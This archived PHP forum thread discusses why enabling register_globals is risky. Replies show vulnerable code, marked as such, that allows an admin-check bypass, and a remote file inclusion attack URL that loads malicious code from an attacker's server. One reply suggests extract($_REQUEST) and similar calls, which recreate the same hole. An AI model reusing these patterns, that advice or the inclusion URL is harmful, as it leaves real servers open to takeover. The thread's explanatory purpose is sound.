473,594 Members | 2,890 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

Question about register_global s in php.ini

Hi all,
I have installed a web-based software written in php which needs
that i should turn "register_globa ls" from off to on in the php.ini.

There are some comments for register_global s in php.ini saying: "You
should do your best to write your scripts so that they do not require
register_global s to be on; Using form variables as globals can easily
lead to possible security problems, if the code is not very well thought
of."

Since there are other php programs running on the same server, i do
care this comments very much.

Can someone give me some hints what is this *possible* security
problem if i turn the register_global s "on"? And what should i pay
attention when writing my own php program on a "register_globa ls on"
server to avoid some attack?
Thanks in advance!

Lian
Jul 17 '05 #1
8 2634
lian wrote:
I have installed a web-based software written in php which needs
that i should turn "register_globa ls" from off to on in the php.ini.
You probably can do that in a .htaccess file (in the directory that
software is put to) instead of changing the global php.ini.
Can someone give me some hints what is this *possible* security
problem if i turn the register_global s "on"? And what should i pay
attention when writing my own php program on a "register_globa ls on"
server to avoid some attack?


Initialize *all* variables and register_global s no longer has any
security impact for your code.

Setting errorlevel to include notices (about using uninitialized
variables) is also a Good Thing.
Suppose you have a form that sends a username and password to the server
for validation. Bad (exploitable) code relying on register_global s could
then be:

<?php /* bad code: DO NOT DUPLICATE */
/* $username and $password have been automatically created */
/* because register_global s is on */
if (($username == 'admin') && ($password == 'SeCReT')) {
$admin = true;
}

/* no initialization for $admin */
/* also relies on the fact that the first use of a variable */
/* sets it to 0 or false (after issuing a notice that is */
/* usually ignored) */
if ($admin) {
/* do admin stuff */
}
?>

When some hacker changes the form (or URL) to also send the 'admin'
value, he'll get access to the admin stuff without knowing the
password.
By just inserting

$admin = false;

before any use of the variable (like the beginning of the script) you
avoid that security risk.

<?php
error_reporting (E_ALL);
ini_set('displa y_errors', '1');
$admin = false; /* initialize $admin */

/* $username and $password have been automatically created */
/* because register_global s is on */
if (($username == 'admin') && ($password == 'SeCReT')) {
$admin = true;
}

/* initialization done for $admin */
if ($admin) {
/* do admin stuff */
}
?>
--
Mail to my "From:" address is readable by all at http://www.dodgeit.com/
== ** ## !! ------------------------------------------------ !! ## ** ==
TEXT-ONLY mail to the whole "Reply-To:" address ("My Name" <my@address>)
may bypass my spam filter. If it does, I may reply from another address!
Jul 17 '05 #2
"Pedro Graca" <he****@dodgeit .com> wrote in message
news:sl******** ***********@ID-203069.user.uni-berlin.de...
lian wrote:
I have installed a web-based software written in php which needs
that i should turn "register_globa ls" from off to on in the php.ini.


You probably can do that in a .htaccess file (in the directory that
software is put to) instead of changing the global php.ini.
Can someone give me some hints what is this *possible* security
problem if i turn the register_global s "on"? And what should i pay
attention when writing my own php program on a "register_globa ls on"
server to avoid some attack?


Initialize *all* variables and register_global s no longer has any
security impact for your code.


That statement is a little misleading. Yes, register_global s would not
promise your system if all global variables are initialized. Initializing
all global variables does not guarantee that would happen, however. If you
do not fully control your execution path, then your initialization code
could be bypassed.

This bring us back to the "why single entry point systems suck" discussion.
If the initialization of globals happen at the designated entry point, and
there exist in the application other unintended entry points (a very common
mistake), then register_global s becomes extremely dangerous. The example
below demonstrate the prototypical register_global s vulnerability.

In web application X, all pages are accessed through controller.php. This
script looks at a GET variable to determine which page to display.
Configuration information is stored in a file called config.php.

config.php:
<?
$CLASS_PATH = "/usr/lib/scripting/php/classes";
$DB_USER = "satan";
$DB_NAME = "hell";
/* other variables */
?>

controller.php:
<?

require("config .php");
require("header .php");

switch($_GET['section']) {
case 'forum': require("forum. php"); break;
case 'about': require("about. php"); break;
/* other pages */
default: require("main.p hp");
}

require("footer .php");

?>

forum.php:
<?

require("$CLASS _PATH/UI.View.Message .php");
require("$CLASS _PATH/UI.View.Message Thread.php");
require("$CLASS _PATH/UI.Widget.HTMLE ditor.php");

/* do stuff */

?>

The vulnerability is in forum.php. Even through controller.php is the page
that people are supposed to go through, nothing stops them from accessing
forum.php directly, in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source. So an attacker
can inject arbituary PHP code into the script with this URL:

http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?

where dk.txt, sitting on the attacker's server, holds the malicious code.

The real design flaw here is allowing remote require/include. Instead of
fixing that the PHP team decided to banish register_global s. Oh well.

Jul 17 '05 #3
Chung Leong <ch***********@ hotmail.com> wrote:
[snip]
The vulnerability is in forum.php. Even through controller.php is the page
that people are supposed to go through, nothing stops them from accessing
forum.php directly, in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source. So an attacker
can inject arbituary PHP code into the script with this URL:

http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?

where dk.txt, sitting on the attacker's server, holds the malicious code.

The real design flaw here is allowing remote require/include.


And the real _design_ flaw in the snipped code is that files that are
only intended for include()s can be directly called by a client. They
should be stored somewhere outside the "documentro ot" or simular
solutions.

Jul 17 '05 #4
"lian" <np***@ming.com > wrote in message
news:32******** *****@individua l.net...
Hi all,
I have installed a web-based software written in php which needs
that i should turn "register_globa ls" from off to on in the php.ini.

There are some comments for register_global s in php.ini saying: "You
should do your best to write your scripts so that they do not require
register_global s to be on; Using form variables as globals can easily
lead to possible security problems, if the code is not very well thought
of."

Since there are other php programs running on the same server, i do
care this comments very much.

Can someone give me some hints what is this *possible* security
problem if i turn the register_global s "on"? And what should i pay
attention when writing my own php program on a "register_globa ls on"
server to avoid some attack?
Thanks in advance!

Lian


See if the application uses a globally included file. If it does, then add
the following lines at the top to simulate register_global s:

extract($_REQUE ST);
extract($_ENV);
extract($_SERVE R);

If it doesn't, it's also not that hard to add them to every file :-)

I would advise against turning on register_global s if you're using other PHP
apps. If they're popular packages and they're not secured in a
register_global s on environment, then chances are there're automated attacks
exploiting any vulnerability. The next thing you know your server will be
spewing out gigabytes of spam. As for this application itself, if it uses a
single entry point system, then don't use it. Read my other message for an
explanation.
Jul 17 '05 #5
.oO(Chung Leong)
The vulnerability is in forum.php. Even through controller.php is the page
that people are supposed to go through, nothing stops them from accessing
forum.php directly,
Not PHP's fault.
in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source.
If enabled.
So an attacker
can inject arbituary PHP code into the script with this URL:

http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?

where dk.txt, sitting on the attacker's server, holds the malicious code.

The real design flaw here is allowing remote require/include. Instead of
fixing that the PHP team decided to banish register_global s. Oh well.


The problem is not the remote execution, but simply the programmer's
mistake. If you want to have a single-entry application then you have to
make sure that there are definitely no other entry points. In your
example the forum.php should not be accessible with an URL. If it is
then you have to live with the consequences.

PHP just offers the tools, whether you build something useful or a time
bomb with it is up to you.

Micha
Jul 17 '05 #6
"Michael Fesser" <ne*****@gmx.ne t> wrote in message
news:rs******** *************** *********@4ax.c om...
.oO(Chung Leong)
The vulnerability is in forum.php. Even through controller.php is the pagethat people are supposed to go through, nothing stops them from accessing
forum.php directly,
Not PHP's fault.


I'm not saying it is.
in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source.


If enabled.


As far as I know there's no way to disable remote file access for require()
and include() only. In most PHP setups therefore it is enabled, as
file("http://...") is such a commonly operation.

Security of an application shouldn't be reliant on server set up anyway. It
should be built into the code.
So an attacker
can inject arbituary PHP code into the script with this URL:

http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?

where dk.txt, sitting on the attacker's server, holds the malicious code.

The real design flaw here is allowing remote require/include. Instead of
fixing that the PHP team decided to banish register_global s. Oh well.


The problem is not the remote execution, but simply the programmer's
mistake. If you want to have a single-entry application then you have to
make sure that there are definitely no other entry points. In your
example the forum.php should not be accessible with an URL. If it is
then you have to live with the consequences.


The mistake is using a single-entry point system. Or to be more specific,
the mistake is executing code in the global scope in files that are not
meant to be accessed. If your include files contain only function and class
definitions, then you wouldn't have a problem even if they reside in a web
accessible directory.
PHP just offers the tools, whether you build something useful or a time
bomb with it is up to you.


Outlook is also just a tool.
Jul 17 '05 #7
.oO(Chung Leong)
The problem is not the remote execution, but simply the programmer's
mistake. If you want to have a single-entry application then you have to
make sure that there are definitely no other entry points. In your
example the forum.php should not be accessible with an URL. If it is
then you have to live with the consequences.
The mistake is using a single-entry point system.


I don't consider that a real problem if done properly (even if I don't
like it).
Or to be more specific,
the mistake is executing code in the global scope in files that are not
meant to be accessed. If your include files contain only function and class
definitions, then you wouldn't have a problem even if they reside in a web
accessible directory.


OK, but why would you want to have files in a web accessible directory
that are not meant for direct access? If I don't want people accessing
certain files then I simply don't provide that possibility.
PHP just offers the tools, whether you build something useful or a time
bomb with it is up to you.


Outlook is also just a tool.


Yep, for spreading viruses. SCNR ;)

Micha
Jul 17 '05 #8
Michael Fesser wrote:
.oO(Chung Leong)
Or to be more specific,
the mistake is executing code in the global scope in files that are not
meant to be accessed. If your include files contain only function and class
definitions , then you wouldn't have a problem even if they reside in a web
accessible directory.


OK, but why would you want to have files in a web accessible directory
that are not meant for direct access? If I don't want people accessing
certain files then I simply don't provide that possibility.


A legitimate reason is that you're distributing the scripts as an
archive that's runnable in-place after extraction.

People installing the software might or might not _have_ a usable area
outside their web root, and if they do it will require extra work to set
it up. Putting include files into a subdirectory is easier to get
working out of the box (and thus reduces the support burden from
third-party users), but you may not be able to guarantee that it's
sealed off from access.

As a precaution, you can toss in a default .htaccess file which will
block off the directory on some Apache configurations, but not all
configurations will allow it.

-- brion vibber (brion @ pobox.com)
Jul 17 '05 #9

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

4
12424
by: Frank | last post by:
Whats best : register_globals ON ? OR register_globals OFF ? I currently use: $_POST
10
2188
by: John | last post by:
Hello. I am a newbie to PHP. I am over halfway through my first book that I'm learning with and have just created login pages etc. I just wondered, if I am running php/mysql/apache locally, should I be okay to turn register_globals on without any security issues? Thanks
6
2493
by: wonder | last post by:
Hi, The CRM application said that need to add an option "REGISTER_GLOBALS=On" to the php.ini file, so I did what it told. But I still can't get rid off the following error: The PHP variable "REGISTER_GLOBALS" is disabled (0). This is fatal. Edit your php.ini and set REGISTER_GLOBALS to "On". I changed the value "On" to "Yes", still getting the same error.
2
1921
by: Phil Latio | last post by:
I am newish to PHP and wish to create an authentication system where a new user is required to validate/complete their sign-up by clicking a link in an email. I am probably capable of putting something together where the user gets sent a link with a set of values but I am sure it would require "register_globals" set to ON. How is this achieved with "register_globals" set to OFF?
15
3375
by: news | last post by:
You'd think it'd be easier to find the answer to this question. Did a search, and all I can find is people asking why something's not working and people replying it's because register_globals is off. I found one person said: "The change is for the better since register_global turned to on had some grim security implications." but no mentioning of what those are! I'm working on a server now, with a couple hundred PHP pages someone has...
6
1782
by: peter | last post by:
Hi. I am just learning PHP. I'm taking over the website at work, which is coded in PHP. I am wondering about register_globals. They are on on the server we use. Is that a threat? I understand I may have to recode if I turn them off, but is there a simple way to turn them off and see if the code still works? Thanks, Peter
17
2905
by: peter | last post by:
I just took over the website at work. I am still learning PHP. Register_globals are on and the script appears to be coded to take advantage of this. I know how to recode the script, but am unsure how to turn them off when I am done. I have googled and came up with placing php_flag register_globals off in the .htaccess file.
5
4707
by: Samuel Shulman | last post by:
I keep getting the 'FATAL ERROR: register_globals is disabled in php.ini, please enable it!' error I changes that settings and I still get this error What should I do next? Thank you, Samuel
8
1782
by: +mrcakey | last post by:
I understand that register_globals was turned off by default as, unless you initialised it, it could be altered by a malicious coder. What I don't understand is how the $_POST form is any more secure. Surely Mr Malicious Coder can still just send his own version of $_POST? Obviously I'm missing something, I just can't figure out what! +mrcakey
0
8253
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
0
8374
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth. The Art of Business Website Design Your website is...
1
8009
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
0
8240
tracyyun
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
0
6661
agi2029
by: agi2029 | last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own.... Now, this would greatly impact the work of software developers. The idea...
0
3867
by: TSSRALBI | last post by:
Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
1
2389
by: 6302768590 | last post by:
Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
1
1482
muto222
by: muto222 | last post by:
How can i add a mobile payment intergratation into php mysql website.
0
1216
bsmnconsultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.